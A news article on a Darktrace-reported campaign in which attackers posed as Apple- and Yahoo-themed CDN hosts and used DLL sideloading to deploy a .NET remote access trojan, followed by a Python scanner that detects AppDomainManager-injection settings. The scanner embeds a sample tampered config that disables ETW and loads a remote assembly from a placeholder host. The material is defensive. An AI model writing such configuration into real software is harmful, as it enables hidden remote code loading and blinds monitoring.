
Hackers used faked Apple & Yahoo infrastructure to hide malware

Hackers spent months hiding malware behind fake Apple-themed internet infrastructure and similarly bogus Windows pop-ups to infiltrate organizations across the Asia-Pacific region without triggering obvious security alarms. Here’s how they did it.

[Image: close-up of XML configuration code on a dark background, showing nested runtime and assemblyBinding elements with assemblyIdentity, codeBase URLs, etwEnable, appDomainManagerAssembly and appDomainManagerType.] Attackers impersonated CDN infrastructure. Image credit: Darktrace

The attackers' command-and-control traffic was disguised as connections to trusted Apple- and Yahoo-themed internet infrastructure. On the endpoint, legitimate Windows software was abused to sideload a malicious DLL, which in turn launched a modular remote access trojan whose traffic blended into ordinary network activity.

Darktrace researchers first observed the activity in customer networks in late September 2025, primarily at organizations in the Asia-Pacific and Japan region. Inside corporate environments they saw repeated abuse of trusted executables alongside fake CDN infrastructure.

By impersonating CDN hostnames associated with major technology brands, the attackers made their malicious traffic look like legitimate content delivery. Trusted Windows binaries and DLL sideloading then launched a modular .NET remote access trojan.
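As an added example (not code from AppleInsider or Darktrace), the Python script below hunts for the configuration technique visible in the screenshot above: a .NET application config whose `<runtime>` section names an `appDomainManagerAssembly` and `appDomainManagerType` (which makes the host executable load an attacker-chosen assembly when the CLR starts), disables ETW via `etwEnable`, or points an assembly `codeBase` at a remote URL. The element forms follow the documented .NET runtime configuration schema; the two sample configs are constructed for this example, and the `Loader` assembly name and the `cdn.example.test` host are placeholders, not indicators from the report.

```python
"""Hunt for AppDomainManager-injection settings in .NET application config files.

Added example; not code from AppleInsider or Darktrace. Sample configs are
constructed to mirror the element names in the screenshot (runtime,
assemblyBinding, assemblyIdentity, codeBase, etwEnable,
appDomainManagerAssembly, appDomainManagerType).
"""
import os
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Constructed sample of a tampered <app>.exe.config. "Loader" and the
# cdn.example.test host are placeholders, not real indicators.
SUSPICIOUS_CONFIG = """<configuration>
  <runtime>
    <etwEnable enabled="false" />
    <appDomainManagerAssembly value="Loader, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null" />
    <appDomainManagerType value="Loader.Manager" />
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Loader" publicKeyToken="null" culture="neutral" />
        <codeBase version="1.0.0.0" href="http://cdn.example.test/Loader.dll" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>
"""

# Constructed benign sample: an ordinary binding redirect, nothing to flag.
BENIGN_CONFIG = """<configuration>
  <startup>
    <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.8" />
  </startup>
  <runtime>
    <assemblyBinding xmlns="urn:schemas-microsoft-com:asm.v1">
      <dependentAssembly>
        <assemblyIdentity name="Newtonsoft.Json" publicKeyToken="30ad4fe6b2a6aeed" culture="neutral" />
        <bindingRedirect oldVersion="0.0.0.0-13.0.0.0" newVersion="13.0.0.0" />
      </dependentAssembly>
    </assemblyBinding>
  </runtime>
</configuration>
"""


def _local(tag):
    """Strip an XML namespace prefix ({urn:...}codeBase -> codeBase)."""
    return tag.rsplit("}", 1)[-1]


def find_runtime_indicators(xml_data):
    """Return (indicator, value) pairs found under <runtime> in a config.

    Accepts str or bytes; parses with the stdlib so it runs offline.
    """
    if isinstance(xml_data, str):
        xml_data = xml_data.encode("utf-8")
    root = ET.fromstring(xml_data)
    findings = []
    for runtime in (el for el in root.iter() if _local(el.tag) == "runtime"):
        for el in runtime.iter():
            name = _local(el.tag)
            if name in ("appDomainManagerAssembly", "appDomainManagerType"):
                # Either element alone is abnormal in a typical app config.
                findings.append((name, el.get("value", "")))
            elif name == "etwEnable" and el.get("enabled", "").lower() == "false":
                # Disabling ETW blinds CLR-level telemetry.
                findings.append((name, "false"))
            elif name == "codeBase":
                # Remote codeBase means the CLR fetches the assembly over the network.
                href = el.get("href", "")
                if urlparse(href).scheme.lower() in ("http", "https"):
                    findings.append((name, href))
    return findings


def is_suspicious(xml_data):
    """True when any AppDomainManager-injection indicator is present."""
    return bool(find_runtime_indicators(xml_data))


def scan_tree(root_dir):
    """Walk a directory and map each flagged *.config path to its findings."""
    hits = {}
    for dirpath, _, files in os.walk(root_dir):
        for fn in files:
            if not fn.lower().endswith(".config"):
                continue
            path = os.path.join(dirpath, fn)
            try:
                with open(path, "rb") as fh:
                    findings = find_runtime_indicators(fh.read())
            except (OSError, ET.ParseError):
                continue  # unreadable or not XML; skip rather than abort the scan
            if findings:
                hits[path] = findings
    return hits


if __name__ == "__main__":
    for label, cfg in (("suspicious", SUSPICIOUS_CONFIG), ("benign", BENIGN_CONFIG)):
        print(label, "->", find_runtime_indicators(cfg) or "no indicators")
```

Point `scan_tree()` at a directory of deployed applications (or at a triage image) to list every config that carries these settings; a hit on `appDomainManagerAssembly` in the config of a legitimately signed, trusted executable is exactly the pattern the caption describes, and the flagged `codeBase` URL is the host to check against the fake CDN domains.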
